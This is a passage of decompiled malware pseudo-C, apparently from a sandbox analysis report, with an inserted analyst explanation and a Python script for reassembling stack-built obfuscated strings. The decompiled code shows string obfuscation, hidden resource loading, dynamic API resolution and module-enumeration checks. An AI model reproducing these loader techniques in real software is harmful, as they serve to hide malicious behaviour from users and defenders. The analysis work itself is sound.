                                                                                                                                                                                                                                    						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                                                                                                                                                                                                    						__eflags = _t354;
                                                                                                                                                                                                                                    						if(_t354 > 0) {
                                                                                                                                                                                                                                    							_t519 =  *(_t559 + 0x3c);
                                                                                                                                                                                                                                    							_t482 = _t537 - _t519;
                                                                                                                                                                                                                                    							__eflags = _t482;
                                                                                                                                                                                                                                    							 *(_t559 + 0x34) = _t519;
                                                                                                                                                                                                                                    							 *(_t559 + 0x88) = _t482;
                                                                                                                                                                                                                                    							 *(_t559 + 0x38) = _t354;
                                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                                    								_t424 =  *(_t559 + 0x34);
                                                                                                                                                                                                                                    								_push( *(_t559 + 0x88) + _t424);
                                                                                                                                                                                                                                    								_push(0x400);
                                                                                                                                                                                                                                    								_push(_t424);
                                                                                                                                                                                                                                    								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                                                                                                                                                                                                    								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                                                                                                                                                                                                    								_t179 = _t559 + 0x38;
                                                                                                                                                                                                                                    								 *_t179 =  *(_t559 + 0x38) - 1;
                                                                                                                                                                                                                                    								__eflags =  *_t179;
                                                                                                                                                                                                                                    							} while ( *_t179 != 0);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                                                                                                                                                                                                                                    						__eflags = _t448;
                                                                                                                                                                                                                                    						if(_t448 < 0) {
                                                                                                                                                                                                                                    							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                                                                                                                                    							__eflags = _t448;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = _t448;
                                                                                                                                                                                                                                    						if(_t448 > 0) {
                                                                                                                                                                                                                                    							_t421 =  *(_t559 + 0x40) - _t448;
                                                                                                                                                                                                                                    							_push(_t421 + _t537);
                                                                                                                                                                                                                                    							_push(_t448);
                                                                                                                                                                                                                                    							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                                                                                                                                                                                                    							__eflags = _t422;
                                                                                                                                                                                                                                    							_push(_t422);
                                                                                                                                                                                                                                    							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                                                                                                                                                                                                    						_t560 = _t559 + 0xc;
                                                                                                                                                                                                                                    						FreeResource(_t551);
                                                                                                                                                                                                                                    						_t552 =  *_t537;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                                                                                                                                                                                                    						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                                                                                                                                                                                                    						_t561 = _t560 + 4;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                                                                                                                                                                                                    						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                                                                                                                                                                                                    						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                                                                                                                                                                                                    						_t192 = _t537 + 4; // 0x4
                                                                                                                                                                                                                                    						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                                                                                                                                                                                                    						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                                                                                                                                                                                                    						_t528 = _t527 + 0xe;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x34)) = 0xce;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x35)) = 0x27;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x38)) = 0x95;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x39)) = 0x21;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x41)) = 0x98;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x42)) = 0x5b;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x45)) = 0x87;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x47)) = 0xf;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x49)) = 0x76;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x50)) = 0x98;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                                                                                                                                                                                                    						 *((char*)(_t561 + 0x54)) = 0;
                                                                                                                                                                                                                                    						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                                                                                                                                                                                                                                    						_t562 = _t561 + 0x24;
                                                                                                                                                                                                                                    						_t365 = LoadLibraryA(_t364); // executed
                                                                                                                                                                                                                                    						_t538 = _t365;
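The stub above never stores its strings in the clear: it writes a buffer one byte at a time into stack slots (`*((char*)(_t561 + 0x34)) = 0xce;` and so on, terminated with a `0`), hands it to E00401650 for decoding, and only then passes the result to FindResourceA (type `0xa`, i.e. RT_RCDATA) and, in the second instance, to LoadLibraryA. Before the decoder can be reversed, an analyst wants the raw buffer in offset order, with holes in the excerpt made visible rather than silently zero-filled. The script below is an added example, not part of the Joe Sandbox report or the sample; it parses decompiler lines of that shape and rebuilds each buffer per base register. Its input is quoted from the decompilation above (the complete `_t561` buffer and the start of the `_t562` buffer, which the excerpt shows with a gap). The decoding routine itself is not reproduced, since nothing on the page shows what E00401650 does.

```python
"""Reassemble stack-built byte buffers from decompiler output (added example)."""
import re

# One decompiler-style byte store, e.g.  *((char*)(_t561 + 0x34)) = 0xce;
STORE_RE = re.compile(
    r"\*\(\(char\*\)\((?P<base>_t\d+)\s*\+\s*(?P<off>0x[0-9a-fA-F]+)\)\)"
    r"\s*=\s*(?P<val>0x[0-9a-fA-F]+|\d+)\s*;"
)

def parse_stores(lines):
    """Collect byte stores as {base_register: {offset: value}}."""
    stores = {}
    for line in lines:
        m = STORE_RE.search(line)
        if m is None:
            continue
        raw = m.group("val")
        value = int(raw, 16) if raw.lower().startswith("0x") else int(raw, 10)
        stores.setdefault(m.group("base"), {})[int(m.group("off"), 16)] = value & 0xFF
    return stores

def contiguous_segments(by_off):
    """Split {offset: byte} into [(start_offset, bytes)] runs.

    A hole between two stores ends a run instead of being zero-filled, so an
    excerpt that is missing lines cannot masquerade as a complete buffer.
    """
    segments, buf, run_start, prev = [], bytearray(), None, None
    for off in sorted(by_off):
        if prev is not None and off != prev + 1:
            segments.append((run_start, bytes(buf)))
            buf, run_start = bytearray(), None
        if run_start is None:
            run_start = off
        buf.append(by_off[off])
        prev = off
    if buf:
        segments.append((run_start, bytes(buf)))
    return segments

def reassemble(lines):
    """Map each base register to its contiguous stack-buffer segments."""
    return {base: contiguous_segments(by_off) for base, by_off in parse_stores(lines).items()}

def c_string_length(blob):
    """Length up to the first NUL, or None if the buffer is not NUL-terminated."""
    idx = blob.find(b"\x00")
    return None if idx < 0 else idx

# Input quoted from the decompilation above: the whole _t561 buffer that is
# decoded by E00401650 and fed to LoadLibraryA, plus the first stores of the
# _t562 buffer, where the excerpt jumps from +0x15 to +0x1e.
DECOMPILED_EXCERPT = """
 *((char*)(_t561 + 0x34)) = 0xce;  *((char*)(_t561 + 0x35)) = 0x27;
 *((char*)(_t561 + 0x36)) = 0x9c;  *((char*)(_t561 + 0x37)) = 0x1a;
 *((char*)(_t561 + 0x38)) = 0x95;  *((char*)(_t561 + 0x39)) = 0x21;
 *((char*)(_t561 + 0x3a)) = 0x2e;  *((char*)(_t561 + 0x3b)) = 0xd;
 *((char*)(_t561 + 0x3c)) = 0xdb;  *((char*)(_t561 + 0x3d)) = 0x29;
 *((char*)(_t561 + 0x3e)) = 0x57;  *((char*)(_t561 + 0x3f)) = 0x56;
 *((char*)(_t561 + 0x40)) = 0xf8;  *((char*)(_t561 + 0x41)) = 0x98;
 *((char*)(_t561 + 0x42)) = 0x5b;  *((char*)(_t561 + 0x43)) = 0xf4;
 *((char*)(_t561 + 0x44)) = 0xb5;  *((char*)(_t561 + 0x45)) = 0x87;
 *((char*)(_t561 + 0x46)) = 0x7b;  *((char*)(_t561 + 0x47)) = 0xf;
 *((char*)(_t561 + 0x48)) = 0xf4;  *((char*)(_t561 + 0x49)) = 0x76;
 *((char*)(_t561 + 0x4a)) = 0xb9;  *((char*)(_t561 + 0x4b)) = 0x34;
 *((char*)(_t561 + 0x4c)) = 0xbf;  *((char*)(_t561 + 0x4d)) = 0x1e;
 *((char*)(_t561 + 0x4e)) = 0xe7;  *((char*)(_t561 + 0x4f)) = 0x78;
 *((char*)(_t561 + 0x50)) = 0x98;  *((char*)(_t561 + 0x51)) = 0xe9;
 *((char*)(_t561 + 0x52)) = 0x6f;  *((char*)(_t561 + 0x53)) = 0xb4;
 *((char*)(_t561 + 0x54)) = 0;
 *((char*)(_t562 + 0x10)) = 0xe0;  *((char*)(_t562 + 0x11)) = 0x18;
 *((char*)(_t562 + 0x12)) = 0xad;  *((char*)(_t562 + 0x13)) = 0x36;
 *((char*)(_t562 + 0x14)) = 0x95;  *((char*)(_t562 + 0x15)) = 0x21;
 *((char*)(_t562 + 0x1e)) = 0x2a;  *((char*)(_t562 + 0x1f)) = 0x57;
 *((char*)(_t562 + 0x20)) = 0xda;  *((char*)(_t562 + 0x21)) = 0xc;
 *((char*)(_t562 + 0x22)) = 0x55;
""".replace(";  *", ";\n *").splitlines()

if __name__ == "__main__":
    for base, segments in reassemble(DECOMPILED_EXCERPT).items():
        for start, blob in segments:
            print(f"{base}+{start:#x}: {len(blob)} bytes, C-string length {c_string_length(blob)}")
            print("    " + blob.hex(" "))
```

Two stores share a source line in the embedded excerpt only to keep it short; the `replace` call puts them back on separate lines before parsing, so the regex still sees one store per line exactly as the report prints them. The `_t561` run comes out as 33 bytes with the NUL at index 32, which is the buffer E00401650 receives; the `_t562` buffer correctly splits into two runs because the excerpt omits the stores between +0x15 and +0x1e.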
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x10)) = 0xe0;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x11)) = 0x18;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x12)) = 0xad;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x13)) = 0x36;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x14)) = 0x95;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x15)) = 0x21;
                                                                                                                                                                                                                                    						_t451 = _t562 + 0x134;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x1e)) = 0x2a;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x1f)) = 0x57;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x20)) = 0xda;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x21)) = 0xc;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x22)) = 0x55;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x23)) = 0x25;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x24)) = 0x8c;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x25)) = 0xf9;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x26)) = 0x35;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x27)) = 0x97;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x28)) = 0xd0;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x29)) = 0x87;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x2a)) = 0x7b;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x2b)) = 0xf;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x2c)) = 0xf4;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x2d)) = 0x76;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x2e)) = 0xb9;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x2f)) = 0x34;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x30)) = 0xbf;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x31)) = 0x1e;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x32)) = 0xe7;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x33)) = 0x78;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x34)) = 0x98;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x35)) = 0xe9;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x36)) = 0x6f;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x37)) = 0xb4;
                                                                                                                                                                                                                                    						 *((char*)(_t562 + 0x38)) = 0;
                                                                                                                                                                                                                                    						_t366 = E00401650(_t562 + 0x14, _t451);
                                                                                                                                                                                                                                    						_t563 = _t562 + 8;
                                                                                                                                                                                                                                    						_t367 = GetProcAddress(_t365, _t366);
                                                                                                                                                                                                                                    						__eflags = _t367;
                                                                                                                                                                                                                                    						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                                                                                                                                                                                                                                    						__eflags = _t452;
                                                                                                                                                                                                                                    						 *(_t563 + 0x47) = _t452 == 0;
                                                                                                                                                                                                                                    						 *0x423480 = _t367;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                                                                                                                                                                                                                                    						 *(_t563 + 0x58) = 0;
                                                                                                                                                                                                                                    						 *(_t563 + 0x54) = 0;
                                                                                                                                                                                                                                    						__eflags = _t452;
                                                                                                                                                                                                                                    						if(_t452 != 0) {
                                                                                                                                                                                                                                    							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                                                                                                                                                                                                                                    							__eflags = _t368;
                                                                                                                                                                                                                                    							if(_t368 >= 0) {
                                                                                                                                                                                                                                    								__eflags =  *(_t563 + 0x47);
                                                                                                                                                                                                                                    								if( *(_t563 + 0x47) == 0) {
                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                                                                                                                                                                                                                                    									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                                                                                                                                                                                                                                    									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                                                                                                                                                                                                                                    									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                                                                                                                                                                                                                                    									__eflags = _t378;
                                                                                                                                                                                                                                    									if(_t378 >= 0) {
                                                                                                                                                                                                                                    										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                                                                                                                                                                                                                                    										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                                                                                                                                                                                                                                    										__eflags = _t383;
                                                                                                                                                                                                                                    										if(_t383 >= 0) {
                                                                                                                                                                                                                                    											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                                                                                                                                                                                                                                    											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                                                                                                                                                                                                                                    											__eflags = _t385;
                                                                                                                                                                                                                                    											if(_t385 >= 0) {
                                                                                                                                                                                                                                    												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                                                                                                                                                                                                                                    												E00401870(_t563 + 0x44, _t552, "_._");
                                                                                                                                                                                                                                    												_t539 = __imp__#8;
                                                                                                                                                                                                                                    												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                                                                                                                                                                                                                                    												 *_t539(_t563 + 0x94);
                                                                                                                                                                                                                                    												E00401870(_t563 + 0x3c, _t552, "___");
                                                                                                                                                                                                                                    												 *_t539(_t563 + 0xa4);
                                                                                                                                                                                                                                    												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                                                                                                                                                                                                                                    												_t542 =  *(_t563 + 0x58);
                                                                                                                                                                                                                                    												__eflags = _t542;
                                                                                                                                                                                                                                    												if(_t542 == 0) {
                                                                                                                                                                                                                                    													E0040AD90(0x80004003);
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                                                                                                                                                                                                                                    												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                                                                                                                                                                                                                                    												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                                                                                                                                                                                                                                    												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                                                                                                                                                                                                                                    												_t543 = _t396;
                                                                                                                                                                                                                                    												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                                                                                                                                                                                                                                    												__imp__#23(_t543, _t563 + 0x48);
                                                                                                                                                                                                                                    												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                                                                                                                                                                                                                                    												_t564 = _t563 + 0xc;
                                                                                                                                                                                                                                    												__imp__#24(_t543);
                                                                                                                                                                                                                                    												_t399 =  *(_t564 + 0x54);
                                                                                                                                                                                                                                    												__eflags = _t399;
                                                                                                                                                                                                                                    												if(_t399 == 0) {
                                                                                                                                                                                                                                    													_t399 = E0040AD90(0x80004003);
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                                                                                                                                                                                                                                    												__eflags = _t543;
                                                                                                                                                                                                                                    												if(_t543 != 0) {
                                                                                                                                                                                                                                    													__imp__#16(_t543); // executed
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												_t402 =  *(_t564 + 0x34);
                                                                                                                                                                                                                                    												__eflags = _t402;
                                                                                                                                                                                                                                    												if(_t402 == 0) {
                                                                                                                                                                                                                                    													_t402 = E0040AD90(0x80004003);
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												_t469 =  *(_t564 + 0x40);
                                                                                                                                                                                                                                    												_t555 = _t402;
                                                                                                                                                                                                                                    												__eflags = _t469;
                                                                                                                                                                                                                                    												if(_t469 == 0) {
                                                                                                                                                                                                                                    													_t531 = 0;
                                                                                                                                                                                                                                    													__eflags = 0;
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													_t531 =  *_t469;
                                                                                                                                                                                                                                    												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
												__imp__#411(0xc, 0, 0);
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
												_t538 = __imp__#9; // 0x742dcf00
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
												if(_t415 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
												}
											}
										}
									}
									_t379 =  *((intOrPtr*)(_t563 + 0x174));
									__eflags = _t379 - _t563 + 0x178;
									if(__eflags != 0) {
										_push(_t379);
										E0040B6B5(0, _t528, _t538, __eflags);
										_t563 = _t563 + 4;
									}
								}
							}
							_t369 =  *(_t563 + 0x54);
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
							}
							_t370 =  *(_t563 + 0x58);
							__eflags = _t370;
							if(_t370 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
							}
						}
						goto L80;
					} else {
						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
						_t565 = _t557 + 8;
						_t547 = _t428;
						_t520 = _t565 + 0x298;
						while(1) {
							_t429 =  *_t520;
							if(_t429 !=  *_t547) {
								break;
							}
							if(_t429 == 0) {
								L7:
								_t429 = 0;
							} else {
								_t493 =  *((intOrPtr*)(_t520 + 1));
								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
									break;
								} else {
									_t520 = _t520 + 2;
									_t547 = _t547 + 2;
									if(_t493 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t429 != 0) {
								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
								_t557 = _t565 + 8;
								_t548 = _t431;
								_t488 = _t557 + 0x298;
								while(1) {
									_t432 =  *_t488;
									__eflags = _t432 -  *_t548;
									if(_t432 !=  *_t548) {
										break;
									}
									__eflags = _t432;
									if(_t432 == 0) {
										L16:
										_t432 = 0;
									} else {
										_t432 =  *((intOrPtr*)(_t488 + 1));
										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
											break;
										} else {
											_t488 = _t488 + 2;
											_t548 = _t548 + 2;
											__eflags = _t432;
											if(_t432 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t432;
									if(_t432 == 0) {
										goto L10;
									} else {
										_t435 = Module32Next(_t525, _t557 + 0x278);
										__eflags = _t435;
										if(_t435 != 0) {
											do {
												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
												_t566 = _t557 + 8;
												_t549 = _t437;
												_t490 = _t566 + 0x298;
												while(1) {
													_t438 =  *_t490;
													__eflags = _t438 -  *_t549;
													if(_t438 !=  *_t549) {
														break;
													}
													__eflags = _t438;
                                                                                                                                                                                                                                    													if(_t438 == 0) {
                                                                                                                                                                                                                                    														L26:
                                                                                                                                                                                                                                    														_t438 = 0;
                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                    														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                                                                                                                                                                                                    														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                                                                                                                                                                                                    														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                                                                                                                                                                                                    															break;
                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                    															_t490 = _t490 + 2;
                                                                                                                                                                                                                                    															_t549 = _t549 + 2;
                                                                                                                                                                                                                                    															__eflags = _t438;
                                                                                                                                                                                                                                    															if(_t438 != 0) {
                                                                                                                                                                                                                                    																continue;
                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                    																goto L26;
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    													L28:
                                                                                                                                                                                                                                    													__eflags = _t438;
                                                                                                                                                                                                                                    													if(_t438 == 0) {
                                                                                                                                                                                                                                    														goto L10;
                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                    														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                                                                                                                                                                                                    														_t557 = _t566 + 8;
                                                                                                                                                                                                                                    														_t550 = _t439;
                                                                                                                                                                                                                                    														_t492 = _t557 + 0x298;
                                                                                                                                                                                                                                    														while(1) {
                                                                                                                                                                                                                                    															_t440 =  *_t492;
                                                                                                                                                                                                                                    															__eflags = _t440 -  *_t550;
                                                                                                                                                                                                                                    															if(_t440 !=  *_t550) {
                                                                                                                                                                                                                                    																break;
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    															__eflags = _t440;
                                                                                                                                                                                                                                    															if(_t440 == 0) {
                                                                                                                                                                                                                                    																L34:
                                                                                                                                                                                                                                    																_t440 = 0;
                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                    																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                                                                                                                                                                                                    																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                                                                                                                                                                                                    																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                                                                                                                                                                                                    																	break;
                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                    																	_t492 = _t492 + 2;
                                                                                                                                                                                                                                    																	_t550 = _t550 + 2;
                                                                                                                                                                                                                                    																	__eflags = _t440;
                                                                                                                                                                                                                                    																	if(_t440 != 0) {
                                                                                                                                                                                                                                    																		continue;
                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                    																		goto L34;
                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    															L36:
                                                                                                                                                                                                                                    															__eflags = _t440;
                                                                                                                                                                                                                                    															if(_t440 == 0) {
                                                                                                                                                                                                                                    																goto L10;
                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                    																goto L37;
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    															goto L81;
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    														asm("sbb eax, eax");
                                                                                                                                                                                                                                    														asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                                                    														goto L36;
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    													goto L81;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												asm("sbb eax, eax");
                                                                                                                                                                                                                                    												asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                                                    												goto L28;
                                                                                                                                                                                                                                    												L37:
                                                                                                                                                                                                                                    												_t442 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                                                                    												__eflags = _t442;
                                                                                                                                                                                                                                    											} while (_t442 != 0);
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										goto L38;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									goto L81;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                                                    								asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                                                    								CloseHandle(_t525);
                                                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L81;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						asm("sbb eax, eax");
                                                                                                                                                                                                                                    						asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				L81:
                                                                                                                                                                                                                                    			}
